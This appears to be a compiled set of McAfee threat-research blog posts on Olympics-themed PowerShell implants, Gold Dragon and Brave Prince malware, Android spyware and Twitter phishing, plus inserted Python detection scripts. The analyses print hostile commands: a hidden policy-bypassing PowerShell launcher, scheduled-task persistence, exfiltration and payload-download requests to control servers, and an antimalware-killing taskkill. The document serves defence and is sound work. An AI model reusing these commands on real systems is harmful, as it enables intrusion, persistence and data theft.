Because we believe that Meltdown and Spectre may offer real-world adversaries significant value, we must consider how they can be used. There is no remote vector to these techniques; an attacker must first deliver code to the victim. To protect against malicious JavaScript, we always urge caution when browsing the Internet. Allow scripting languages to execute only from trusted sites. McAfee Windows Security Suite or McAfee Endpoint Security (ENS) can provide warnings if you visit a known dangerous site. These McAfee products can also provide an alternate script-execution engine that prevents known malicious scripts from executing. As operating systems are changed to mitigate Meltdown and Spectre, organizations and individuals should apply those updates as soon as possible.

Even though we have not seen any malware currently exploiting these techniques, McAfee is currently evaluating opportunities to provide detection within the scope of our products; we expect most solutions to lie within processor and operating system updates. Based on published proofs of concept, we have provided some limited detection under the names OSX/Spectre, Linux/Spectre, and Trojan-Spectre.

Microsoft has released an out-of-cycle patch because of this disclosure: https://support.microsoft.com/en-us/help/4056892/windows-10-update-kb4056892. Due to the nature of any patch or update, we suggest first applying manual updates on noncritical systems, to ensure compatibility with software that involves the potential use of low-level operating system features. McAfee teams are working to ensure compatibility with released patches where applicable.

While the world wonders about the potential impact of today’s critical disclosures, we also see a positive message. This was another major security flaw discovered and communicated by the information security community, as opposed to the discovery or leak of “in the wild” attacks. Will this disclosure have negative aspects? Most likely yes, but the overall effect is more global attention to software and hardware security, and a head start for the good guys on developing more robust systems and architectures for secure computing.

The post Decyphering the Noise Around ‘Meltdown’ and ‘Spectre’ appeared first on McAfee Blogs.

Malicious Document Targets Pyeongchang Olympics


McAfee Advanced Threat Research analysts have discovered a campaign targeting organizations involved with the Pyeongchang Olympics.

Attached in an email was a malicious Microsoft Word document with the original file name 농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc (“Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”).

The primary target of the email was icehockey@pyeongchang2018.com, with several organizations in South Korea on the BCC line. The majority of these organizations had some association with the Olympics, either in providing infrastructure or in a supporting role. The attackers appear to be casting a wide net with this campaign.

The campaign to target Pyeongchang Olympics began December 22, 2017 with the most recent activity appearing December 28. The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file, and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. They also wrote custom PowerShell code to decode the hidden image and reveal the implant.

Analysis

The malicious document was submitted from South Korea to Virus Total on December 29 at 09:04, a day after the original email was sent to the target list. The email was sent from the IP address 43.249.39.152, in Singapore, on December 28 at 23:34. The attacker spoofed the message to appear to be from info@nctc.go.kr, which is the National Counter-Terrorism Center (NCTC) in South Korea. The timing is interesting because the NCTC was in the process of conducting physical antiterror drills in the region in preparation for the Olympic Games. The spoofed source of this email suggests the message is legitimate and increases the chances that victims will treat it as such.

Based on our analysis of the email header, this message did not come from NCTC, rather from the attacker’s IP address in Singapore. The message was sent from a Postfix email server and originated from the hostname ospf1-apac-sg.stickyadstv.com. When the user opens the document, text in Korean tells the victim to enable content to allow the document to be opened in their version of Word.

The malicious document with instructions to enable content.

The enable content message.

The document contains an obfuscated Visual Basic macro:

Visual Basic macro.

The malicious document launches a PowerShell script when the user clicks “Enable Content.” The document was created on December 27 at 15:52 by the author “John.”

The malicious document launches the following PowerShell script:

Manually executing the PowerShell script at the command line.

The script downloads and reads an image file from a remote location and carves out a hidden PowerShell implant script embedded within the image file to execute.

The attackers used the open-source tool Invoke-PSImage, released December 20, to embed the PowerShell script into the image file. The steganography tool works by embedding the bytes of a script into the pixels of the image file, giving the attacker the ability to hide malicious PowerShell code in a visible image on a remote server. The following script can be identified as generated by Invoke-PSImage to execute the attacker’s implant in an image from a remote server.

The initial PowerShell script.

The image that contains the hidden PowerShell code.

To verify the usage of steganography, we employed the tool StegExpose to check the file:

The result confirms the presence of hidden data in our file.

Once the script runs, it passes the decoded script from the image file to the Windows command line in a variable $x, which uses cmd.exe to execute the obfuscated script and run it via PowerShell.

&&set  xmd=echo  iex (ls env:tjdm).value ^| powershell -noni  -noex  -execut bypass -noprofile  -wind  hidden     – && cmd   /C%xmd%

The extracted script is heavily disguised, using a combination of string-format operator obfuscation and other string-based obfuscation techniques.

The obfuscated PowerShell implant script.

The attacker’s objective is to make analysis difficult and to evade detection technologies that rely on pattern matching. Because the obfuscation makes use of native functions in PowerShell, the script can run in an obfuscated state and work correctly.

Obfuscated control servers.

When we deobfuscate the control server URLs, the implant establishes a connection to the following site over SSL:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/login/process.php.

Based on our analysis, this implant establishes an encrypted channel to the attacker’s server, likely giving the attacker the ability to execute commands on the victim’s machine and to install additional malware. Ultimately this PowerShell implant will be set to automatically start daily at 2 am via a scheduled task (shown below). The view.hta contains the same PowerShell-based implant and establishes a remote connection over SSL to hxxps://200.122.181.63:443/components/com_tags/views/news.php.

“C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 14:00 /TN “MS Remoute Update” /TR C:\Users\Ops03\AppData\Local\view.hta

The contents of view.hta.
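Both launch patterns described above (a hidden, policy-bypassing PowerShell that Invoke-Expressions a script read from an environment variable, and a schtasks persistence task whose action is an .hta under a user profile) can be triaged from process-creation telemetry. The following detection logic is an added example, not code from the original post; the log events it runs over are constructed to model the command lines shown above, and the host and user names are made up.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events modelled on the command lines shown in
# the post; host names, user names and the two benign entries are made up.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "Ops03",
     "cmdline": "cmd /C echo iex (ls env:tjdm).value | powershell -noni -noex "
                "-execut bypass -noprofile -wind hidden -"},
    {"host": "ws01", "user": "Ops03",
     "cmdline": "powershell -noni -noex -execut bypass -noprofile -wind hidden -"},
    {"host": "ws01", "user": "Ops03",
     "cmdline": r'"C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 14:00 '
                r'/TN "MS Remoute Update" /TR C:\Users\Ops03\AppData\Local\view.hta'},
    {"host": "ws02", "user": "svc_inv",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"host": "ws02", "user": "svc_inv",
     "cmdline": r'schtasks.exe /Create /SC WEEKLY /TN Backup /TR "C:\Program Files\Backup\run.exe"'},
]

# PowerShell accepts any unambiguous prefix of a parameter name, which is why
# "-noni -noex -execut bypass -wind hidden" works. The patterns match on
# prefixes rather than full switch names so abbreviations do not evade them.
PS_INDICATORS = [
    ("hidden-window",      2, re.compile(r"-w\w*\s+hid", re.I)),
    ("exec-policy-bypass", 2, re.compile(r"-e[xp]\w*\s+bypass", re.I)),
    ("invoke-expression",  2, re.compile(r"\biex\b|invoke-expression", re.I)),
    ("env-var-payload",    1, re.compile(r"\benv:\w+", re.I)),
    ("non-interactive",    1, re.compile(r"-noni\w*", re.I)),
    ("no-exit",            1, re.compile(r"-noe\w*", re.I)),
]
PS_THRESHOLD = 4

# A scheduled task whose action is a script host (HTA, WSH, PowerShell) living
# in a user-writable location is the persistence shape seen in this campaign.
SCRIPT_EXTENSIONS = (".hta", ".js", ".vbs", ".wsf", ".ps1")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
TASK_THRESHOLD = 3


@dataclass
class Finding:
    host: str
    user: str
    technique: str
    indicators: list
    score: int


def powershell_indicators(cmdline):
    """Return (indicator names, score) for a PowerShell-style command line."""
    hits = [(name, w) for name, w, rx in PS_INDICATORS if rx.search(cmdline)]
    return [n for n, _ in hits], sum(w for _, w in hits)


def task_action(cmdline):
    """Extract the /TR (task run) argument of a schtasks command line, or None."""
    m = re.search(r'/tr\s+("[^"]+"|\S+)', cmdline, re.I)
    return m.group(1).strip('"') if m else None


def schtasks_indicators(cmdline):
    """Return (indicator names, score) for a schtasks /Create command line."""
    if not re.search(r"\bschtasks(\.exe)?\b.*?/create\b", cmdline, re.I):
        return [], 0
    action = task_action(cmdline)
    if action is None:
        return [], 0
    lowered = action.lower()
    hits = []
    if lowered.endswith(SCRIPT_EXTENSIONS):
        hits.append(("script-host-action", 3))
    if any(p in lowered for p in USER_WRITABLE):
        hits.append(("user-writable-path", 2))
    return [n for n, _ in hits], sum(w for _, w in hits)


def triage(event):
    """Score one event against both patterns; return a Finding or None."""
    cmd = event["cmdline"]
    if re.search(r"\bpowershell(\.exe)?\b", cmd, re.I):
        names, score = powershell_indicators(cmd)
        if score >= PS_THRESHOLD:
            return Finding(event["host"], event["user"],
                           "hidden-powershell-launch", names, score)
    names, score = schtasks_indicators(cmd)
    if score >= TASK_THRESHOLD:
        return Finding(event["host"], event["user"],
                       "schtasks-script-persistence", names, score)
    return None


def scan(events):
    """Run triage over a list of events and keep only the findings."""
    return [f for f in map(triage, events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host} {f.user} {f.technique} score={f.score} {f.indicators}")
```

The weighted scoring keeps a lone `-NoProfile` or a weekly task that runs an executable from Program Files below the threshold, while the cmd.exe launcher, its hidden PowerShell child, and the .hta task from the post all score as findings.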

During our research, we discovered a cached Apache server log for the IP address 81.31.47.101, which is shared hosting. This log contained information for the control server thlsystems.forfirst.cz, which showed an IP address from South Korea connecting to the specific URL paths contained in the PowerShell implants. This indicates that the implant was active in South Korea and targets were likely being infected.

Apache server log from December 29, 2017.

While investigating thlsystems.forfirst.cz we discovered that the webpage belongs to a legitimate entity, suggesting this is a compromised server being used as both an encrypted backchannel for the attacker and the distribution of implants. The server also hosts a copy of the obfuscated PowerShell implant.

The implant establishes an encrypted channel to the following URL path:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/admin/get.php

An image from December 30, 2017.

When investigating the IP address from the PowerShell implant 200.122.181.63 we found a server in Costa Rica that resolves to mafra.go.kr.jeojang.ga. The domain jeojang.ga was registered via Freenom, a free anonymous domain provider. It appears the attacker is using parts of a domain that belong to the South Korean Ministry of Agriculture and Forestry, which is in line with the attached document name in the email, but this domain has nothing to do with this government agency.

A version of the malicious document from December 22 embedded the PowerShell implant directly into the Word document in the form of an HTA file. McAfee Advanced Threat Research analysts discovered another document that was hosted at this domain; its original title is 위험 경보 (전국야생조류 분변 고병원성 AI(H5N6형) 검출).docx, which also appears to come from the Ministry of Agriculture and Forestry. This document was created on December 22 by the same author, “John.” The document does not contain macros, rather OLE streams for the embedded HTA files. When the Korean-language docx icon is clicked, it launches the embedded HTA file Error733.hta. This file contains the same script code to launch the PowerShell implant as in the view.hta example.

An earlier malicious document that relies on OLE streams.


Conclusion

The basic method in this case, an in-memory implant using PowerShell along with obfuscation to avoid detection, is a common and increasingly popular fileless technique used in cyberattacks. We have not previously seen this kind of attack targeting victims in South Korea.

The use of the steganography tool shows how quickly the adversary has adapted to new tools. On December 20, the tool Invoke-PSImage was released to the public and within seven days was tested and deployed in a campaign targeting organizations involved in the 2018 Pyeongchang Olympics.

With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes. In similar past cases, the victims were targeted for their passwords and financial information. In this case the adversary is targeting the organizations involved in the Winter Olympics by using several techniques to make it more tempting to open the weaponized document:

  • Spoofed email address from South Korea’s National Counter-Terrorism Council
  • Use of Korean language
  • Asking users to open the content because the document is in protected mode
  • Partial use of the original South Korean Ministry of Agriculture and Forestry domain in a registered fake domain for malicious intent

The Advanced Threat Research team has discovered an increase in the use of weaponized Word documents against South Korean targets in place of the traditional use of weaponized documents exploiting vulnerabilities in the Hangul word processor software.


Indicators of compromise

SHA-1

  • c388b693d10e2b84af52ab2c29eb9328e47c3c16
  • 8ad0a56e3db1e2cd730031bdcae2dbba3f7aba9c

IPs

  • 200.122.181.63

Domains

  • thlsystems.forfirst.cz
  • mafra.go.kr.jeojang.ga

The post Malicious Document Targets Pyeongchang Olympics appeared first on McAfee Blogs.

North Korean Defectors and Journalists Targeted Using Social Networks and KakaoTalk


Recently, South Korean media wrote about North Korean refugees and journalists being targeted by unknown actors using KakaoTalk (a popular chat app in South Korea) and other social network services (such as Facebook) to send links to install malware on victims’ devices. This method shows that attackers are always looking for different ways to deliver malware.

The McAfee Mobile Research Team has acquired malicious APK files that were used in the targeted attacks. According to the articles, Google-shortened URLs were used to spread malware. We analyzed those statistics.

There are two versions of the dropper malware: “북한기도” (Pray for North Korea) and “BloodAssistant” (a health care app). In both cases, most clicks originated in South Korea and the most common browser and operating system combination was Chrome and Windows. (Android was the second most common.) The referrers diagram of BloodAssistant shows Facebook was used in 12% of cases to send the link to its targets.

In the case of the journalist who was targeted, the attacker sent a shortened link showing a thumbnail of another story written by the journalist, according to the news article. The link directs to ihoodtec[.]com/upload/newslist[.]php (now offline), which seems to be used for redirecting to links in other domains. This shortened URL was clicked by someone with an account at mail[.]police[.]go[.]kr, suggesting the shortened URL was also sent via email to the police address.

The number of clicks might not be meaningful because it can include access from malware researchers, but what is meaningful is that malware-download links were spread using different platforms: Facebook, KakaoTalk, email, etc.

Analysis

Dropper

All the malicious APK files (including additional variants) dropped the Trojan on the victim’s device. Although the apps look different, the dropper mechanism is identical. The following screens show the execution of the dropper files.

Figure 1: Screenshots of droppers.

When the dropper APK executes, it first checks whether the device is already infected. If not infected, it phishes the victim to turn on the accessibility permission. If the victim clicks the pop-up window, the view changes to the accessibility settings menu so the app can acquire the permission.

When the accessibility service starts, it overlays the window (by playing a video, for example) to hide the process of turning on required settings and dropping and installing the Trojan. The overlay is removed after the Trojan is installed. The following diagram explains the flow after executing the dropper malware.

Figure 2: Execution flow of the dropper.

Trojan

The dropped Trojan uses popular cloud services Dropbox and Yandex as a control server to upload data and receive commands. The following diagram explains the execution flow of the Trojan. The names of broadcast receivers and services (with some misspellings) may vary between samples but the execution is the same.

Figure 3: Execution flow of the Trojan.

When the dropped Trojan is installed, it saves device information in a temporary folder and uploads it to the cloud. It then downloads a file containing commands and other data to control the infected device. (We’ll explain the format of the downloaded file in the next section.) Most of the malicious behaviors—such as saving SMS, contact information, etc.—are implemented inside a separate dex file “core,” which is downloaded from the control server. This dex file is referenced in many places in the malware. The malicious functionality can be extended, as we’ll explain in the following section.

Command file structure

The command file has its own format. The following diagram explains the types of values. Offset designators are used to retrieve each value when parsing the file. The next table explains each value.

Figure 4: Command file format.

Figure 5: Command file values.

The handler for command code received from the cloud (CMD value) is implemented as a separate dex file and is downloaded either before or after the malware parses the command file. This mechanism allows the attacker to easily extend its malicious functionality without needing to update the whole malware.

Our analysis shows that only some of the commands are implemented now and uploaded to the cloud control server. Note Command 12 captures KakaoTalk chat logs.

Figure 6: Implemented commands.

Variants

We have found variants of the APKs that news articles initially reported on Google Drive. (The APKs on Google Drive are marked as malware and cannot be downloaded.) Some variants use different cloud services as their control servers while others drop the separate call-recording app “com.toh.callrecord” (assets/bbb). The following graph shows the relationships among variants and dropped files.

Figure 7: Relationships among variants.

The Actors

Initial malicious APKs we found were uploaded to Google Drive by the same account, and we found a connected social network account. By following activities of this account, we conclude with high confidence that this account was used to send shortened URLs to victims to get them to download malicious APK files.

The group behind this campaign is certainly familiar with South Korean culture, TV shows, drama, and the language because the account names associated with the cloud services are from Korean drama and TV shows, including the following:

Figure 8: Cloud service accounts.

We found the use of an interesting word, “피형” (“blood type”), which is not used in South Korea but is used in North Korea. (“혈액형” is the word for blood type in South Korea.) We also found a North Korean IP address in test log files of some Android devices that are connected to accounts used to spread the malware. However, Wi-Fi was on so we cannot exclude the possibility that the IP address is private.

By looking at the list of deleted folders in the cloud, we found one with the name “sun Team Folder,” possibly the name of the actors. This group has been active since 2016, according to the cloud storage creation date.

Figure 9: Deleted folder in the cloud.

Conclusion

This malware campaign is highly targeted, using social network services and KakaoTalk to directly approach targets and implant spyware. We cannot confirm who is behind this campaign, and the possible actor Sun Team is not related to any previously known cybercrime groups. The actors are familiar with South Korea and appear to want to spy on North Korean defectors, and on groups and individuals who help defectors.

McAfee Mobile Security detects this malware as Android/HiddenApp.BP. Always keep your mobile security application updated to the latest version, and never install applications from unverified sources. We recommend installing KakaoTalk only from Google Play. These habits will reduce the risk of infection by malware.

The post North Korean Defectors and Journalists Targeted Using Social Networks and KakaoTalk appeared first on McAfee Blogs.


Twitter Accounts of US Media Under Attack by Large Campaign


A previously reported campaign purportedly carried out by Turkish hacker group “Ayyildiz Tim” targeting high-profile, verified Twitter accounts with the purpose of spreading Turkish political propaganda appears to have escalated within the last 24 hours. McAfee Advanced Threat Research has investigated the new events and discovered the following. On January 13, the Twitter account of the Indian ambassador to the United Nations was taken over and spread pro-Pakistan and pro-Turkey postings:

What seemed to be a single event soon became a targeted campaign that we discovered in cooperation with our partner SocialSafeGuard. Combining their technology and our threat researchers, we started to build a timeline of events:


In each case in this timeline, the account was restored after several hours.

Once the accounts were compromised, the attackers direct-messaged the account contacts with propaganda for their cause or with a link to convince them to click on a phishing site that would harvest the Twitter credentials of the victim.

One example of such a site is hxxp://fox-news.medianewsonline.com/.

Visiting the page shows the following:

If we look at the source code of the page, we discover several Turkish-language segments.

Focusing on the domains used for the phishing sites, we discovered more registered sites. Some examples:

  • mypressonline.com
  • official-twitter-jp.mypressonline.com
  • feedbac-verifv.mypressonline.com

Who is behind this campaign? According to the messages used, the Turkish hacker group “Ayyildiz Tim” (AYT) claims to be responsible for the attacks. The group was founded in 2002 and advocates Turkish state ideology. In the following example, we see the background image of Greta van Susteren has changed to one of the many wallpapers used by the group:

We advise journalists in particular, as well as others in high-profile positions, to follow appropriate safeguards to protect their accounts.

We are aware that one of the tactics from this group is to use Direct Messaging to communicate with other prominent Twitter accounts. There is also evidence that private messaging history has been accessed from certain compromised accounts of prominent figures, along with other sensitive or confidential information such as private phone numbers and emails. If you receive a message, even from someone you know or trust, be aware that the message may not be from the person you know. It is potentially directing you to malicious content.

You absolutely should verify through an alternate channel that the link is safe to click.

The post Twitter Accounts of US Media Under Attack by Large Campaign appeared first on McAfee Blogs.

Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems


UPDATE (Feb. 12, 2018): A new variant of the original fileless implant appeared on Feb. 5, 2018, indicating the attack has resumed. The new variant has the same author and metadata as the original documents discovered in December, as well as a nearly identical implant. A key difference, however, is that the attackers leveraged hacked servers in Santiago, Chile. See indicators of compromise for this update at the bottom of this post.

ORIGINAL POST (Feb. 2, 2018): McAfee Advanced Threat Research (ATR) recently released a report describing a fileless attack targeting organizations involved with the Pyeongchang Olympics. The attack used a PowerShell implant that established a channel to the attacker’s server to gather basic system-level data. What was not determined at that time was what occurred after the attacker gained access to the victim’s system.

McAfee ATR has now discovered additional implants that are part of an operation to gain persistence for continued data exfiltration and for targeted access. We have named these implants, which appeared in December 2017, Gold Dragon, Brave Prince, Ghost419, and RunningRat, based on phrases in their code.

On December 24, 2017, our analysts observed the Korean-language implant Gold Dragon. We now believe this implant is the second-stage payload in the Olympics attack that ATR discovered January 6, 2018. The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker’s server. However, this implant required additional modules to be executed to be a fully capable backdoor. In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task. Gold Dragon has a much more robust persistence mechanism than the initial PowerShell implant and enables the attacker to do much more to the target system. Gold Dragon reappeared the same day that the Olympics campaign began.

The Gold Dragon malware appears to have expanded capabilities for profiling a target’s system and sending the results to a control server. The PowerShell implant had only basic data-gathering capabilities—such as username, domain, machine name, and network configuration—which are useful only for identifying interesting victims and launching more complex malware against them.

Gold Dragon

Gold Dragon is a data-gathering implant observed in the wild since December 24. Gold Dragon gets its name from the hardcoded domain www.golddragon.com, which we found throughout the samples.

This sample acts as a reconnaissance tool and downloader for subsequent payloads in the infection chain. Apart from downloading and executing binaries from the control server, Gold Dragon uses the hardcoded domain string as the key to encrypt data that the implant obtains from the system. The domain is not used for control; the encrypted data is sent to the server ink.inkboom.co.kr, which was used by previous implants as early as May 2017.

Gold Dragon shares elements, code, and behavior with the implants Ghost419 and Brave Prince, which we have tracked since May 2017. A DLL-based implant created on December 21 (the same day the first malicious Olympics document appeared) was downloaded by a Gold Dragon variant created December 24. This variant was created three days before the targeted spear phishing email with the second document that was sent to 333 victim organizations. The December 24 variant of Gold Dragon used the control server nid-help-pchange.atwebpages.com, which was also used by a Brave Prince variant from December 21.

The first variants of Gold Dragon appeared in the wild in South Korea in July 2017. The original Gold Dragon had the file name 한글추출.exe, which translates as Hangul Extraction and was seen exclusively in South Korea. Five variants of Gold Dragon compiled December 24 appeared heavily during the targeting of the Olympics organizations.

Analyzing Gold Dragon

As part of its initialization, Gold Dragon:

  • Builds its imports by dynamically loading multiple APIs from multiple libraries
  • Gains debug privileges (“SeDebugPrivilege”) for its own process to read remote memory residing in other processes

The malware does not establish persistence for itself but for another component (if it is found) on the system:

  • The malware begins by looking for an instance of the Hangul word processor (HWP) running on the system. (HWP is a Korean word processor similar to Microsoft Word.)

Checking for HWP.exe in the process list.

  • If HWP.exe is found running on the system, the malware finds the currently open file in HWP by extracting the file path from the command-line argument passed to HWP.exe
  • This word file (usually named *.hwp) is copied into the temporary file path

C:\DOCUME~1\<username>\LOCALS~1\Temp\2.hwp

  • 2.hwp is an exact copy of the file loaded into HWP.exe
  • The malware reads the contents of 2.hwp and finds an “MZ magic marker” in the file indicated by the string “JOYBERTM”

Checking for the MZ marker in the HWP file.

  • This marker indicates the presence of an encrypted executable (MZ image) in the .hwp file; the malware decrypts it and writes it to the Startup folder for the user:

C:\Documents and Settings\<username>\Start Menu\Programs\Startup\viso.exe

  • This step establishes the persistence of the malware across reboots on the endpoint
  • Once the decrypted executable is written to the Startup folder, 2.hwp is deleted from the endpoint

The malware might perform this activity for a couple of reasons:

  • Establish persistence for itself on the endpoint
  • Establish persistence of another component of the malware on the endpoint
  • Update itself on endpoint after a separate updater component downloads the update from the control server

The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware. Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server:

  • C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server:

  • Directory listing of the user’s Desktop folder using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Desktop\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the user’s recently accessed files using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Recent >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the system’s %programfiles% folder using command:

cmd.exe /c dir C:\PROGRA~1\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Systeminfo of the endpoint using command:

cmd.exe /c systeminfo >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Copies the file ixe000.bin from:

C:\Documents and Settings\<username>\Application Data\Microsoft\Windows\UserProfiles\ixe000.bin

To:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Registry key and value information for the current user’s Run key (with information collected):

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Number of subkeys

(<KeyIndex>) <KeyName>

Number of values under each key, including the parent Run key

(<ValueIndex>) <Value_Name> <Value_Content>

Registry Run key enumeration by Gold Dragon.

An example of 1.hwp with registry and system information:

Gold Dragon performs these steps in the exfiltration process:

  • Once the malware has gathered the required data from the endpoint, it encrypts the data file 1.hwp using the password “www[dot]GoldDragon[dot]com”
  • The encrypted content is written to the data file 1.hwp.
  • During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL:

http://ink[dot]inkboom.co.kr/host/img/jpg/post.php

  • HTTP data/parameters used in the request include:
    • Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG <followed by the Base64-encoded, encrypted system information>
    • User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)
    • Accept-Language: en-us
    • HTTP Version: HTTP/1.0

The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request:

GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=<Computer_Name>_<username>&continue=dnsadmin

After successfully retrieving the component from the control server, the next-stage payload is copied to the Application Data directory of the current user and executed:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\hupdate.ex

(note “ex,” not “exe”)

The capability to download additional components from the control server.
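The exfiltration POST and the stage-download GET described above leave a recognisable pattern in web proxy logs: a fixed URL path on the control server, the multipart boundary string that Gold Dragon shares with Ghost419, the victim identity leaked in the filename parameter, and the hardcoded user agent. The matcher below is an added example (not McAfee's code or the malware's) that runs those indicators over a handful of constructed log lines. The log layout, the sample lines, and the rule that the user agent alone is only a low-confidence hit are assumptions made for the example; the indicator values themselves are the ones given in the post.

```python
"""Match the Gold Dragon / Ghost419 HTTP indicators described above against proxy log lines."""
import re
from urllib.parse import urlsplit, parse_qs

# Indicator values taken from the post.
GD_USER_AGENT = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; "
                 "Trident/4.0; .NET CLR 1.1.4322)")
GD_BOUNDARY = "WebKitFormBoundarywhpFxMBe19cSjFnG"   # shared by Gold Dragon and Ghost419
GD_EXFIL_PATH = "/host/img/jpg/post.php"              # HTTP POST carrying the encrypted 1.hwp
GD_DOWNLOAD_PATH = "/host/img/jpg/download.php"       # HTTP GET for the next stage (hupdate.ex)
GD_C2_DOMAINS = {"ink.inkboom.co.kr", "nid-help-pchange.atwebpages.com"}

# Assumed proxy log layout (not from the post):
#   <timestamp> <client_ip> <method> <url> <status> "<user-agent>" "<content-type>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) '
    r'"(?P<ua>[^"]*)" "(?P<ctype>[^"]*)"$')


def analyze(line):
    """Return None for an unparsable line, otherwise a dict with the matched
    indicators, a verdict and, for a stage-download request, the victim identity
    that the filename parameter leaks."""
    m = LOG_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    url = urlsplit(m["url"])
    hits = []
    if url.hostname in GD_C2_DOMAINS:
        hits.append("known_c2_domain")
    if GD_BOUNDARY in m["ctype"]:
        hits.append("shared_multipart_boundary")
    if m["method"] == "POST" and url.path == GD_EXFIL_PATH:
        hits.append("exfil_post_path")
    victim = None
    if m["method"] == "GET" and url.path == GD_DOWNLOAD_PATH:
        query = parse_qs(url.query)
        if query.get("continue") == ["dnsadmin"]:
            hits.append("stage_download_request")
            # filename=<Computer_Name>_<username>; splitting on the first '_'
            # assumes the computer name itself contains no underscore.
            computer, sep, user = query.get("filename", [""])[0].partition("_")
            victim = (computer, user) if sep else (computer, "")
    if m["ua"] == GD_USER_AGENT:
        hits.append("gold_dragon_user_agent")
    # The user agent is a plausible IE8 string that legitimate clients can also
    # send, so on its own it rates only a low-confidence hit.
    strong = [h for h in hits if h != "gold_dragon_user_agent"]
    verdict = "high" if strong else ("low" if hits else "none")
    return {"client": m["client"], "host": url.hostname, "hits": hits,
            "verdict": verdict, "victim": victim}


def scan(lines):
    """Yield the analysis of every line that produced at least one indicator hit."""
    for line in lines:
        result = analyze(line)
        if result and result["hits"]:
            yield result


# Constructed sample log lines (not real traffic), written in the assumed layout above.
SAMPLE_LOG = [
    '2017-12-27T09:14:02Z 10.0.0.25 POST http://ink.inkboom.co.kr/host/img/jpg/post.php 200 '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" '
    '"multipart/form-data; boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG"',
    '2017-12-27T09:14:05Z 10.0.0.25 GET http://ink.inkboom.co.kr/host/img/jpg/download.php'
    '?filename=WIN7-PC_bob&continue=dnsadmin 200 '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" ""',
    '2017-12-27T09:15:11Z 10.0.0.31 GET https://www.example.com/ 200 '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/63.0" ""',
    '2017-12-27T09:16:40Z 10.0.0.31 GET http://intranet.example.com/news 200 '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" ""',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["verdict"], hit["client"], hit["host"], hit["hits"], hit["victim"])
```

The domain, path and boundary checks are the ones worth alerting on; the user agent is kept as a corroborating signal because a legitimate IE8 client on Windows 7 can send the same string, so a rule that fires on it alone will page the on-call engineer for nothing.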

The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products:

  • The presence of any process with the keywords “v3” and “cleaner.”

Checking for antimalware or cleaner processes.

  • If found, these processes are terminated by sending a WM_CLOSE message to their windowing threads.

Terminating an antimalware/cleaner process.

 

Brave Prince

Brave Prince is a Korean-language implant that contains code and behavior similar to the Gold Dragon variants, specifically the system profiling and control server communication mechanism. The malware gathers detailed logs about the victim’s configuration, contents of the hard drive, registry, scheduled tasks, running processes, and more. Brave Prince was first observed in the wild December 13, 2017, sending logs to the attacker via South Korea’s Daum email service. Later variants posted the data to a web server via an HTTP POST request, in the same way that Gold Dragon does.

The embedded domain braveprince.com.

The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker’s email address. Later variants upload the file to a web server via an HTTP POST request. The type of data this implant gathers from the victim’s system:

  • Directories and files
  • Network configuration
  • Address resolution protocol cache
  • System configuration, including scheduled tasks

Both variants of Brave Prince can kill a process associated with a tool created by Daum that can block malicious code. This tool is exclusive to South Korea.

  • taskkill /f /im daumcleaner.exe

The later variants of Brave Prince include the following hardcoded strings:

  • c:\utils\c2ae_uiproxy.exe
  • c:\users\sales\appdata\local\temp\dwrrypm.dl

 

